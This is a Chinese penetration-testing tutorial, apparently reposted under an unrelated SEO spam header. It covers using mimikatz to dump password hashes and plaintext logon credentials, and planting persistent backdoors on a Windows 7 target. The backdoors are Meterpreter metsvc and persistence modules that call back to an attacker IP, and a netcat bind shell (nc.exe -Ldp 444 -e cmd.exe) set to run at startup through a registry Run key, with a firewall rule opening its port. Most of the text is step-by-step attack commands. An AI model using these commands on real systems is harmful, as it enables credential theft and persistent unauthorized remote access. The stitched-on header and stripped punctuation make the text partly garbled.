做网站 先上线再调整可以做pos机的网站

当前位置: 首页 > news >正文

做网站 先上线再调整,可以做pos机的网站,家具网站开发报告,门户网站代码结构内网渗透系列-mimikatz的使用以及后门植入 文章目录 内网渗透系列-mimikatz的使用以及后门植入前言mimikatz的使用后门植入 msf永久后门植入 #xff08;1#xff09;Meterpreter后门#xff1a;Metsvc#xff08;2#xff09;Meterpreter后门#xff1a;Persistence NC后…内网渗透系列-mimikatz的使用以及后门植入 文章目录 内网渗透系列-mimikatz的使用以及后门植入前言mimikatz的使用后门植入 msf永久后门植入 1Meterpreter后门Metsvc2Meterpreter后门Persistence NC后门 后记 前言 内网渗透最重要的环节就是权限维持当我们获取到靶机的权限后当对方的机器关机后我们所获取的会话也会跟着消失也就是说当他重新开启后我们又得重新进行信息收集漏洞利用又重复着上一个渗透的过程工程量就很大了。所以为了能一直维持着权限我们需要进行权限的维持保持着下一次靶机登录时我只需要监听端口就可以获取对方的shell了。这就是我们今天说的后门植入的内容了。 mimikatz的使用 讲解后门植入的内容之前我们先简单介绍一下mimikatz的用法实际场景中我们可以反弹shell到cs中进行横向移动使用自带的提权和mimikatz的模块进行获取用户的密码。 mimikatz的使用 使用规则是必须是管理员或者system权限才可以使用 首先拿到会话以及system权限后在加载插件 load mimikatz help mimikatz msv导出哈希值 用户名和密码哈希值 wdigest 直接获取的账号的明文密码 kerberos信息 也可以找出账号的明文密码 原来的命令 mimakatz_commend -h mimakatz_commend -f mimakatz_commend -f a::写错误的指令报出帮助信息 会出现各个模块比如 mimakatz_commend system:: mimakatz_commend system::user 获取哈希值 mimakatz_commend samdump::hashes mimakatz_commend -f process::list列出当前的进程信息 mimakatz_commend -f service::list列出当前的服务进程 想在靶机上打开一个cmd的窗口就输入 mimakatz_commend -f nogpo:: mimakatz_commend -f nogpo::cmd mimakatz_commend -f nogpo::regedit 获取认证信息 mimakatz_commend -f sekurlsa:: mimakatz_commend -f sekurlsa::wdigest获取明文信息 mimakatz_commend -f sekurlsa::logonPasswords获取用户的登录密码 权限提升 mimakatz_commend -f privilege:: mimakatz_commend -f privilege::debug 破解扫雷游戏 mimakatz_commend -f minesweeper::infos 后门植入 msf永久后门植入 讲解方法之前我们先了解一下为什么要生成后门 1.meterpretere shell运行与内存中重启后失效2.避免重复性的渗透工作3.漏洞修复后仍旧可就维持控制 两种方法生成后门 1Meterpreter后门Metsvc 通过服务启动 进入会话后 run metsvc -h run metsvc -A //设定端口上传后门文件 会在以下路径生成服务 C:\Users\zhian2\AppData\Local\Temp\tjPfsdnGycGdiM 这个服务是上传上去了但没有显示在进程中 我来讲解一下步骤吧 首先进入会话 上传成功我们到靶机上查看上传的文件 服务已启动但是在win7上执行metsvc.exe执行不了。 在这里我由于关掉了防火墙后uac所以直接就get到system权限之前得不到系统权限是因为uac和防火墙的原因所以想要提权的话还是得绕过uac或者直接上线cs直接利用模块获取system的权限。 2Meterpreter后门Persistence 通过启动型启动 特性定期回连系统 启动是回连自动运行 Run persistence -A -S -U -i 20 -p 4321 -r 192.168.101.102 Run persistence -A -X -i 20 -p 4321 -r 192.168.101.102 其中-A是生成的程序-X是自动连接-i是延时时间-p是对应的端口-r是kali的ip地址 在这里给大家介绍第二种方法比较好用重启之后还是可以回连会话的。我们来尝试一下步骤如下 run persistence -A -X -i 20 -p 666 -r 192.168.101.102 background jobs 过了20秒后又会返回一个会话 我们删掉进程后过了20秒他有返回了一个会话了 sessions -k 9 我们就获得了system权限了 我们重启后等待20秒输入sessions查看会话就会发现出现了新的会话了或者再等一会他自己就会回连一个会话了。 我们输入sessions -i 13获取会话getuidgetsystem最终获得了system权限了。
NC后门 我先把大概的步骤给大家看一下接下来就要开始演示了。 3NC后门 上传nc Upload /rootnc.exe C:\windows\system32 修改注册表 枚举注册表键值 reg enumkey -k HKLM\software\microsoft\windows\currentversion\run在当前主键下增加一个nc 键值 reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’查看nc键值 reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc 设置防火墙 开启有一个cmd通道 execute -f cmd -i -H查看防火墙状态 Netsh firewall show opmode添加防火墙规则允许444端口通过 netsh firewall add portopening TCP 444 “Service Firewall” ENABLE查看端口状态 Netsh firewall show portopening 开始连接 nc -v ip port 具体步骤如下 首先在kali的桌面上传一个nc.exe或者放在/home/zhian/nc.exe upload /home/zhian/nc.exe c:\windows\system32 枚举注册表键值 reg enumkey -k HKLM\software\microsoft\windows\currentversion\run 在当前主键下增加一个nc 键值 reg setval -k HKLM\software\microsoft\windows\currentversion\run -v nc -d ‘C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe’-d表示要执行的内容 查看nc键值 reg queryval -k HKLM\software\microsoft\windows\currentversion\run -v nc execute -f cmd -i -H-H表示要开启一个cmd的窗口
查看防火墙状态 Netsh firewall show opmode 添加防火墙规则允许444端口通过 netsh firewall add portopening TCP 444 “Service Firewall” ENABLE 查看端口状态 Netsh firewall show portopening 我们重启win7后进程中就出现了nc.exe的进程我们只需要监听即可 在kali上输入nc 192.168.101.102 444就返回shell了 实验到这里就结束了后续有学习内网渗透方面的知识会给大家更新的大家要好好复习呀。 后记 这只是内网渗透的冰山一角也只是权限维持的一部分。内网如果要更深入的话会涉及很多横向移动权限提升方面的知识。最常见的就是路由和代理配置的问题在往期文章都有提及到大家可以看看我往期写的文章好好复习一下吧。